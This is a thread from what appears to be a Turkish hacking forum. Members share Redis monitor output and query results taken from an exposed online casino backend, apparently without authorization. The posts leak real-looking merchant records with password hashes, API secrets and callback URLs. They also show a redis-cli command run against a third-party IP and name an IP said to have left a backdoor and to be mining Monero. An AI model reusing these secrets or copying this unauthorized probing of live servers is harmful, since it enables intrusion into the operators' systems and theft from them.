1770835260.852403 [0 100.64.24.103:56286] "set" "alert:lock:game" "1770835260" "ex" "50" "nx"
1770835260.853562 [0 100.64.24.103:55910] "hello" "3"
1770835260.854709 [0 100.64.24.103:55910] "smembers" "alert:merchantIdsSet"
1770835260.855352 [0 100.64.24.103:55910] "get" "alert:rule:game"
1770835320.847176 [0 100.64.24.103:39640] "hello" "3"
1770835320.847298 [0 100.64.24.103:39700] "hello" "3"
1770835320.848576 [0 100.64.24.103:39700] "sadd" "alert:merchantIdsSet" "1705374337" "1749463880" "1756783833" "1717040534" "1737979303" "1756280008" "1752205941" "1714041819" "1757738189" "1759923719" "1718612562"
1770835320.848661 [0 100.64.24.103:39640] "set" "alert:lock:game" "1770835320" "ex" "50" "nx"
1770835320.849065 [0 100.64.24.103:39640] "smembers" "alert:merchantIdsSet"
1770835320.849886 [0 100.64.24.103:39640] "get" "alert:rule:game"
1770835347.726652 [0 100.64.109.53:40058] "hello" "3"
1770835347.731118 [0 100.64.109.53:40058] "get" "gmp:match:bot_data:1797709388989"
1) "1756280008"
2) "{\"id\":146,\"created_at\":1756280008,\"updated_at\":1756280008,\"deleted_at\":0,\"account\":\"Stagingjayagaming\",\"password\":\"$2a$10$.UVU7UWbAAOYDkINCPhiHeVkFF1pJJlSx4ww4xisX5wy9V0zyf6PG\",\"merchant_id\":\"1756280008\",\"merchant_name\":\"jayagaming\",\"phone\":\"\",\"email\":\"Stagingjayagaming\",\"address\":\"\",\"merchant_desc\":\"\",\"call_back\":\"https://jayasaopaulo.top/gpatsapi\",\"secret\":\"9de41a40e9f40333f2ebec24c6cc9bcac19e43feaa25568490955b016939127b\",\"currency\":\"[\\\"COP\\\"]\",\"status\":2,\"client\":1,\"merchant_type\":0,\"resource_id\":0,\"wallet_mode\":0,\"region\":\"us-west\"}"
3) "1737979303"
4) "{\"id\":68,\"created_at\":1737979303,\"updated_at\":1763980432,\"deleted_at\":0,\"account\":\"StagingBetfarms\",\"password\":\"$2a$10$Xu7t2XHGGpbUjeRlIXNL4urDlquoa9q8SsMSqq9IQeRr5gm.OvLgm\",\"merchant_id\":\"1737979303\",\"merchant_name\":\"Betfarms\",\"phone\":\"\",\"email\":\"StagingBetfarms\",\"address\":\"\",\"merchant_desc\":\"Betfarms\xe6\xb5\x8b\xe8\xaf\x95\xe8\xb4\xa6\xe5\x8f\xb7\",\"call_back\":\"https://dygj9ovk49h3y.cloudfront.net/api/panda_game\",\"secret\":\"fd40adaeb4b1b7450be119cc04ee08d20c3342649f110febb07fdbf945a86109\",\"currency\":\"[\\\"BDT\\\",\\\"EGP\\\",\\\"XOF\\\",\\\"KRW\\\",\\\"LBP\\\",\\\"TRY\\\",\\\"ZAR\\\",\\\"ETB\\\",\\\"PHP\\\",\\\"USD\\\",\\\"BRL\\\",\\\"NGN\\\",\\\"MXN\\\",\\\"KES\\\",\\\"COP\\\",\\\"THB\\\",\\\"INR\\\",\\\"IDR\\\",\\\"MYR\\\",\\\"GHS\\\",\\\"XAF\\\",\\\"USDT\\\",\\\"PEN\\\",\\\"AED\\\",\\\"SAR\\\",\\\"PKR\\\",\\\"CLP\\\",\\\"TND\\\",\\\"EUR\\\",\\\"SEK\\\",\\\"UGX\\\",\\\"ARS\\\"]\",\"status\":2,\"client\":1,\"merchant_type\":0,\"resource_id\":0,\"wallet_mode\":0,\"region\":\"us-west\"}"
Dün geceden
Rating - 0%
Baya piç etmişler bu sunucuyu
Bişey çıkacağını sanmıyorum
Dump.rdb falan olsaydı belki ordan bişey çıkardı
Bişey çıkacağını sanmıyorum
Dump.rdb falan olsaydı belki ordan bişey çıkardı
Rating - 0%
Ama gerçekten beraber iş yapmayı çok özlemişim duygulandım amk
- Katılım
- 2 Ara 2015
- Tepki puanı
- 7,823
Rating - 0%
bende ama dediğin gibi pek de bir halt çıkmayacak gözlerim ağrıdı 45 den sonrafazla ekran hiç çekilmiyor
Rating - 0%
Sana bi tane mavi ışık filtreli gözlük çözelim yaşlı kurt
- Katılım
- 2 Ara 2015
- Tepki puanı
- 7,823
Rating - 0%
daha bu gecelik yeter
34.70.205.211 bu götveren içeriye arka kapı bırakmış
34.70.205.211 bu götveren içeriye arka kapı bırakmış
Rating - 0%
Monero mining yapıyodur ibne
Sistemin casino sistemi olduğundan haberi bile yoktur
Rating - 0%
Günün sonunda 15 tl kazanacak amk cocuğu bizim tezgahı patlattı yav
- Katılım
- 2 Ara 2015
- Tepki puanı
- 7,823
Rating - 0%
valla öyle sanırımi
──╼ $redis-cli -h 54.94.58.48 SMEMBERS "alert:gamesSet"
1) "classic_crash"
2) "super_double"
3) "go_bananas"
4) "labubu_mines"
5) "classic_ring"
6) "red_hot7s"
7) "bankheist"
8) "losttreasure"
9) "footballx"
10) "ninjacrash"
11) "classic_limbo"
12) "classic_keno"
13) "yummycarnival"
14) "rock_paper_scissors"
15) "lucky_tanks"
16) "classic_dice"
17) "monopoly"
18) "classic_fiery_bot"
19) "scratch_match"
20) "color_realistic"
21) "super_ace"
22) "fastfurious"
- Katılım
- 2 Ara 2015
- Tepki puanı
- 7,823
Rating - 0%
neyse ilgilenmek kuracalamak isteyen baksın izleyelim yetkilendirmeden ziyade kafamda iki durum var biri kesin
miner yapılıyor ve honeypot olma ihtimali de var herkese iyi forumlar kolay gelsin
miner yapılıyor ve honeypot olma ihtimali de var herkese iyi forumlar kolay gelsin
HELAL OLSUN
Eline sağlık
- Katılım
- 28 Nis 2024
- Tepki puanı
- 0
Rating - 0%
Teşekkürler
teşekkürler
nmönmö
About Us & Legal Notice
Legal Notice:
The website spyhackerz.org is classified as a “Hosting Provider” (“Yer Sağlayıcı”) within the meaning of Article 2, paragraph 1, subparagraph (m) and Article 5 of Law No. 5651. All content is created entirely by users without any prior approval, similar to platforms such as X, Instagram, Facebook, etc.
As a hosting provider, spyhackerz.org is not obliged to monitor, control, or investigate user-generated content or any potentially unlawful sharing. There are no “attack teams” on spyhackerz.org, and no harmful activities are carried out against websites located in Türkiye.
SPYHACKERZ is not responsible for any individual hacking-related forum activities carried out by its members. If any hacking activity is conducted against your websites using the name spyhackerz.org, all responsibility lies solely with the member who performs the attack.